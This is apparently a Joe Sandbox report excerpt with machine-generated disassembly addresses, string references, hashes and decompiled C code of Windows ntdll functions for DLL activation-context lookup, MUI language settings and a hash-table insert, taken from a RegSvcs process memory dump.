0x018f8e2c
0x018f8e38
0x018f8e3e
0x018f8e43
0x018f8eb5
0x018f8eb9
0x019392aa
0x019392af
0x019392e8
0x019392e8
0x019392af
0x018f8eb9
0x018f8e45
0x018f8e53
0x018f8e5b
0x018f8e5f
0x018f8e78
0x018f8e78
0x018f8e7d
0x018f8ec3
0x018f8ecd
0x018f8ed2
0x018f8ed2
0x018f8ec5
0x018f8ec5
0x00000000
0x018f8e7d
0x018f8e67
0x018f8ea4
0x0193931a
0x00000000
0x00000000
0x01939320
0x018f8ea4
0x018f8e70
0x01939325
0x01939340
0x01939345
0x01939345
0x018f8e76
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 018F8E53

Strings

LdrpFindDllActivationContext, xrefs: 01939331, 0193935D
Querying the active activation context failed with status 0x%08lx, xrefs: 01939357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0193932A
minkernel\ntdll\ldrsnap.c, xrefs: 0193933B, 01939367

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 6447031e2f71eee99b3d00bb35e92385a3161b249634d75f5aefe2ceec83e2f6
Instruction ID: 4d7aaa03be6e89a70b326f3c5cee008e2a3413e78314d00c600d9a2d79896125
Opcode Fuzzy Hash: 6447031e2f71eee99b3d00bb35e92385a3161b249634d75f5aefe2ceec83e2f6
Instruction Fuzzy Hash: B9412932A003159FEB36AE1CCCC8B7976A5AB42348F06456DEB18D7151E7706F808381

Uniqueness

Uniqueness Score: -1.00%

Function 018D3D34 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E018D3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E018D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E018D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E018D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E018D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E018D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L018E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0190F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01911370(_t276, 0x18a4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0190BB40(0,  &_v68, _t170);
									if(L018D43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0190BB40(_t257,  &_v68, _t243);
								if(L018D43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01911370(_t278, 0x18a4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L018E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0190F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01911370(_v16, 0x18a4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0190BB40(_t262,  &_v68, _t244);
								if(L018D43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01911370(_t282, 0x18a4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0190BB40(_t262,  &_v68, _t201);
							if(L018D43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L018E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0190F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01911370(_t280, 0x18a4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0190BB40(_t267,  &_v68, _t245);
							if(L018D43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01911370(_t284, 0x18a4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0190BB40(_t267,  &_v68, _t224);
						if(L018D43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x018d3d3c
0x018d3d42
0x018d3d44
0x018d3d46
0x018d3d49
0x018d3d4c
0x018d3d4f
0x018d3d52
0x018d3d55
0x018d3d58
0x018d3d5b
0x018d3d5f
0x018d3d61
0x018d3d66
0x01928213
0x01928218
0x018d4085
0x018d4088
0x018d408e
0x018d4094
0x018d409a
0x018d40a0
0x018d40a6
0x018d40a9
0x018d40af
0x018d40b6
0x018d40bd
0x018d40bd
0x018d3d83
0x0192821f
0x01928229
0x01928238
0x01928238
0x0192823d
0x0192823d
0x018d3da0
0x018d3daf
0x018d3db5
0x018d3dba
0x018d3dba
0x018d3dd4
0x018d3e94
0x018d3eab
0x018d3f6d
0x018d3f84
0x018d406b
0x018d406b
0x018d406e
0x018d406e
0x018d4070
0x018d4074
0x01928351
0x01928351
0x018d407a
0x018d407f
0x0192835d
0x01928370
0x01928377
0x01928379
0x0192837c
0x0192837c
0x0192835d
0x00000000
0x018d407f
0x018d3f8a
0x018d3f8d
0x018d3f90
0x018d3f95
0x0192830d
0x0192830f
0x018d3f9b
0x018d3fac
0x018d3fae
0x018d3fb1
0x018d3fb1
0x018d3fb6
0x01928317
0x0192831a
0x00000000
0x018d3fbc
0x018d3fc1
0x018d3fc9
0x018d3fd7
0x018d3fda
0x018d3fdd
0x018d4021
0x018d4021
0x018d4029
0x018d4030
0x018d4044
0x018d4046
0x018d4046
0x018d4044
0x018d4049
0x01928327
0x01928334
0x01928339
0x0192833c
0x018d404f
0x018d404f
0x018d404f
0x018d4051
0x018d4056
0x018d4063
0x018d4063
0x018d4068
0x00000000
0x018d4068
0x018d3fdf
0x018d3fe2
0x018d3fe4
0x018d3fe7
0x018d3fef
0x018d4003
0x018d4005
0x018d4005
0x018d400c
0x018d4013
0x018d4016
0x018d4017
0x018d401b
0x018d401e
0x00000000
0x018d401e
0x018d3fb6
0x018d3eb1
0x018d3eb4
0x018d3eb7
0x018d3ebc
0x019282a9
0x019282ab
0x018d3ec2
0x018d3ed3
0x018d3ed5
0x018d3ed8
0x018d3ed8
0x018d3edd
0x019282b3
0x019282b6
0x00000000
0x018d3ee3
0x018d3ee8
0x018d3eed
0x018d3ef0
0x018d3ef3
0x018d3f02
0x018d3f05
0x018d3f08
0x019282c0
0x019282c3
0x019282c5
0x019282c8
0x019282d0
0x019282e4
0x019282e6
0x019282e6
0x019282ed
0x019282f4
0x019282f7
0x019282f8
0x019282fc
0x019282ff
0x019282ff
0x018d3f0e
0x018d3f11
0x018d3f16
0x018d3f1d
0x018d3f31
0x01928307
0x01928307
0x018d3f31
0x018d3f39
0x018d3f48
0x018d3f4d
0x018d3f50
0x018d3f50
0x018d3f53
0x018d3f58
0x018d3f65
0x018d3f65
0x018d3f6a
0x00000000
0x018d3f6a
0x018d3edd
0x018d3dda
0x018d3ddd
0x018d3de0
0x018d3de5
0x01928245
0x018d3deb
0x018d3df7
0x018d3dfc
0x018d3dfe
0x018d3e01
0x018d3e01
0x018d3e06
0x0192824d
0x0192824f
0x01928254
0x00000000
0x018d3e0c
0x018d3e11
0x018d3e16
0x018d3e19
0x018d3e29
0x018d3e2c
0x018d3e2f
0x0192825c
0x0192825f
0x01928261
0x01928264
0x0192826c
0x01928280
0x01928282
0x01928282
0x01928289
0x01928290
0x01928293
0x01928294
0x01928298
0x0192829b
0x0192829b
0x018d3e35
0x018d3e38
0x018d3e3d
0x018d3e44
0x018d3e58
0x019282a3
0x019282a3
0x018d3e58
0x018d3e60
0x018d3e6f
0x018d3e74
0x018d3e77
0x018d3e77
0x018d3e7a
0x018d3e7f
0x018d3e8c
0x018d3e8c
0x018d3e91
0x00000000
0x018d3e91

Strings

Kernel-MUI-Number-Allowed, xrefs: 018D3D8C
WindowsExcludedProcs, xrefs: 018D3D6F
Kernel-MUI-Language-SKU, xrefs: 018D3F70
Kernel-MUI-Language-Disallowed, xrefs: 018D3E97
Kernel-MUI-Language-Allowed, xrefs: 018D3DC0

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 76b12d617c824d7a94548bd53a20f51df7580bc786099b9bae3cbe0093d3dbfd
Instruction ID: fcba5c9bb03ea342a9fc069206c7c04cf241608c951b12991e14719970d3791f
Opcode Fuzzy Hash: 76b12d617c824d7a94548bd53a20f51df7580bc786099b9bae3cbe0093d3dbfd
Instruction Fuzzy Hash: 00F138B2D00619EFDB15DF98C980AAEBBF9FF49750F14006AE905E7650E7749E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0199E824 Relevance: 6.5, APIs: 4, Instructions: 493
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E0199E824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x19bd360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L018EFAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E018EFA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x19bb1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E018E2280(E0190F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E018DFFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x19bb1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E0190B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E018FF3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x19bb1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x19bb1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E0199E7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E0199E7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E0199E7A8(_t38) == 0) {
									_t406 = 0;
								}
								E018EFA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E0199E7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}

0x0199e833
0x0199e839
0x0199e83e
0x0199e841
0x0199e848
0x0199e84b
0x0199e851
0x0199e8b2
0x0199e8b2
0x0199e8b5
0x0199e90b
0x0199e911
0x0199e913
0x0199e913
0x0199e91a
0x0199e91d
0x0199e922
0x0199e924
0x0199e924
0x0199e924
0x0199e92f
0x0199e933
0x0199e935
0x0199e93a
0x0199e940
0x0199e948
0x0199e950
0x0199e955
0x00000000
0x00000000
0x0199e957
0x0199e95c
0x0199e9cb
0x0199e9d2
0x0199e9d4
0x0199e9f2
0x0199e9f6
0x0199ea10
0x0199ea18
0x0199ea1a
0x0199ea1f
0x0199ea2c
0x0199ea2d
0x0199ea2e
0x0199ea32
0x0199ea3d
0x0199ea42
0x0199ea45
0x0199ea51
0x0199ea60
0x0199ea65
0x0199ea68
0x0199ea6a
0x0199ea6a
0x0199ea6a
0x0199ea6f
0x0199ea76
0x0199ea7c
0x0199ea7e
0x0199ea81
0x0199ea85
0x0199ea88
0x0199ea8c
0x0199ea8f
0x0199ea93
0x0199ea98
0x00000000
0x00000000
0x0199ea9a
0x0199ea9d
0x0199eaa2
0x0199eb0e
0x0199eb15
0x0199eb17
0x0199eb33
0x0199eb36
0x0199eb39
0x0199eb3f
0x0199eb45
0x0199eb4a
0x0199eb52
0x0199ecb1
0x0199ecb9
0x0199ecbe
0x0199ecc3
0x0199ecc6
0x0199eceb
0x0199ecee
0x0199ecf9
0x0199ecfe
0x0199ed00
0x0199ed05
0x0199ed07
0x0199ed0a
0x0199ed0c
0x0199ed0e
0x0199ed12
0x0199ed19
0x0199ed1e
0x0199ed24
0x0199ed2a
0x0199ed2a
0x0199ed2c
0x0199ed3e
0x0199ed3e
0x0199eb5a
0x0199eb62
0x0199eb69
0x00000000
0x00000000
0x0199eb6f
0x0199eb75
0x0199eb79
0x0199eb79
0x0199eb88
0x0199eb8e
0x0199eb90
0x0199eb92
0x0199eb97
0x0199ed3f
0x0199ed45
0x00000000
0x00000000
0x0199ed4b
0x0199ed4e
0x00000000
0x0199eb9d
0x0199eb9d
0x0199eb9d
0x0199eba2
0x0199ebb5
0x0199ebbc
0x0199ebbe
0x0199ebbe
0x0199ebc3
0x0199ebc5
0x0199ebcb
0x0199ebd2
0x0199ebd5
0x0199ebdb
0x0199ebdf
0x0199ebe1
0x0199ebf0
0x0199ebf9
0x0199ec04
0x0199ec07
0x0199ec0a
0x0199ec82
0x0199ec85
0x0199ec8b
0x0199ec91
0x0199ec93
0x0199ec96
0x0199ec9b
0x0199eca6
0x0199ecac
0x0199ecae
0x0199ecae
0x00000000
0x00000000
0x00000000
0x00000000
0x0199ec0c
0x0199ec0c
0x0199ec0c
0x0199ec0f
0x0199ec12
0x0199ec15
0x0199ec15
0x0199ec18
0x0199ec1e
0x00000000
0x00000000
0x0199ec22
0x0199ec28
0x0199ec4b
0x0199ec5b
0x0199ec5d
0x0199ec63
0x0199ec65
0x0199ec68
0x0199ec6b
0x0199ec6b
0x0199ec70
0x0199ec71
0x0199ec74
0x0199ec7d
0x00000000
0x0199ebe3
0x0199ebe3
0x0199ebe6
0x0199ebe6
0x0199ebe7
